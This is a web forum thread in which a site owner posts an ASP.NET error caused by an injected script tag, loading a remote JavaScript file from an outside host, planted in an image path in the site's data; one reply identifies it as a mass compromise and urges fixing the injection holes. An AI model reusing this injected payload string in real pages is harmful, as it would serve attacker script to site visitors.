+ Reply to Thread
Results 1 to 3 of 3

Thread: Website main page

  1. #1
    Barn Loyal todd2006 is an unknown quantity at this point todd2006's Avatar
    Join Date
    Mar 2008
    Posts
    889
    Rep Power
    4

    Website main page

    HEllo,

    When I open the main page of the website it gives me this error


    Code:
    Server Error in '/' Application.
    '~/HotelImages/Middle_hfhtdvWcolpOxQep.jpg<script sr<script src=http://a0v.org/x.js></script>' is not a valid virtual path.
    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
    
    Exception Details: System.Web.HttpException: '~/HotelImages/Middle_hfhtdvWcolpOxQep.jpg<script sr<script src=http://a0v.org/x.js></script>' is not a valid virtual path.
    
    Source Error:
    
    The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:
    
    1. Add a "Debug=true" directive at the top of the file that generated the error. Example:
    
      <%@ Page Language="C#" Debug="true" %>
    
    or:
    
    2) Add the following section to the configuration file of your application:
    
    <configuration>
       <system.web>
           <compilation debug="true"/>
       </system.web>
    </configuration>
    
    Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.
    
    Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.
    
    Stack Trace:
    
    [HttpException (0x80004005): '~/HotelImages/Middle_hfhtdvWcolpOxQep.jpg<script sr<script src=http://a0v.org/x.js></script>' is not a valid virtual path.]
       System.Web.Util.UrlPath.CheckValidVirtualPath(String path) +8711395
       System.Web.Util.UrlPath.Combine(String appPath, String basepath, String relative) +126
       System.Web.UI.Control.ResolveClientUrl(String relativeUrl) +180
       System.Web.UI.WebControls.Image.AddAttributesToRender(HtmlTextWriter writer) +68
       System.Web.UI.WebControls.WebControl.RenderBeginTag(HtmlTextWriter writer) +20
       System.Web.UI.WebControls.WebControl.Render(HtmlTextWriter writer) +20
       System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
       ASP.masterhomepage_master.__Renderform1(HtmlTextWriter __w, Control parameterContainer) +2707
       System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +256
       System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
       System.Web.UI.HtmlControls.HtmlForm.RenderChildren(HtmlTextWriter writer) +163
       System.Web.UI.HtmlControls.HtmlContainerControl.Render(HtmlTextWriter writer) +32
       System.Web.UI.HtmlControls.HtmlForm.Render(HtmlTextWriter output) +51
       System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
       System.Web.UI.HtmlControls.HtmlForm.RenderControl(HtmlTextWriter writer) +40
       ASP.masterhomepage_master.__Render__control2(HtmlTextWriter __w, Control parameterContainer) +453
       System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +256
       System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
       System.Web.UI.HtmlControls.HtmlContainerControl.Render(HtmlTextWriter writer) +32
       System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
       ASP.masterhomepage_master.__Render__control1(HtmlTextWriter __w, Control parameterContainer) +163
       System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +256
       System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
       System.Web.UI.Control.Render(HtmlTextWriter writer) +10
       System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
       System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +134
       System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
       System.Web.UI.Page.Render(HtmlTextWriter writer) +29
       System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
       System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
       System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1266
    
    
    Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
    
    can someone tell me what this error means

    todd

  2. #2
    The Barnfather jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead has much to be proud of jmurrayhead's Avatar
    Join Date
    Mar 2008
    Location
    Reston, VA
    Posts
    4,547
    Blog Entries
    9
    Real Name
    Jason
    Rep Power
    22

    Do what is says by going to the web.config file and add/change this:
    Code:
    2) Add the following section to the configuration file of your application:
    
    <configuration>
       <system.web>
           <compilation debug="true"/>
       </system.web>
    </configuration>
    
    jmurrayhead
    If you agree, give me rep.
    If you like it here...throw us a few bones to help support us.


  3. #3
    Ask Me About Dragons :D Shadow Wizard has a spectacular aura about Shadow Wizard has a spectacular aura about Shadow Wizard's Avatar
    Join Date
    Jul 2008
    Location
    Israel
    Posts
    795
    Blog Entries
    2
    Real Name
    Yahav
    Rep Power
    5

    your site has been hacked, like many many others..
    you can see here part of the hacked websites:
    http://a0v.org/x.js - Google Search
    don't worry, Google identify if the threat has not been removed yet and
    show huge warning screen if you click infected link.

    I suggest you take the website down, learn about XSS attacks, go through all your pages and protect
    against it. only after you fixed all your vulnerable code get your website back online.
    Last edited by Shadow Wizard; July 30th, 2009 at 08:42 AM.

+ Reply to Thread

Similar Threads

  1. My personal website homepage
    By sbenj69 in forum Website Reviews
    Replies: 19
    Last Post: April 28th, 2009, 04:29 AM
  2. Mask Page Content While Page Loading
    By BLaaaaaaaaaarche in forum JavaScript Programming
    Replies: 1
    Last Post: March 16th, 2009, 02:27 PM
  3. My personal website
    By sbenj69 in forum Website Reviews
    Replies: 18
    Last Post: March 9th, 2009, 12:10 PM
  4. Suggestions please (website review)
    By sbenj69 in forum Website Reviews
    Replies: 21
    Last Post: January 26th, 2009, 03:57 PM
  5. Load Subforms at Runtime (save initial loading speed of main form)
    By boblarson in forum Access Database Samples
    Replies: 0
    Last Post: January 11th, 2009, 11:45 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

SEO by vBSEO